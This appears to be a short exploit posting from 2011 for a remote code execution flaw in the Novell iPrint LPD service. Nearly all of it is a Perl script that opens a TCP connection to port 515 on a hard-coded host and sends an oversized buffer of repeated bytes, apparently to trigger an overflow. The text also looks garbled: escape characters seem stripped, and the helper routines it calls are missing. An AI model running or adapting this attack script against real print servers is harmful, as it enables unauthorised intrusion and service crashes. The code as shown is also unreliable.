Novell Iprint LPD Remote Code Execution
Posted on 19 February 2011
#!/usr/bin/perl ## Source: ## http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIG{INT} = &abort; my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCK_STREAM; my $timeout = 1; my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) { usage() } my @commands = ( {Command => 'Send', Data => "x01x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x44x43x42x41x0a"}, ); my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $! "; print "connected to: $host:$port "; $sock->autoflush(1); binmode $sock; foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf] "; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."] "; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $! "; } } close ($sock);
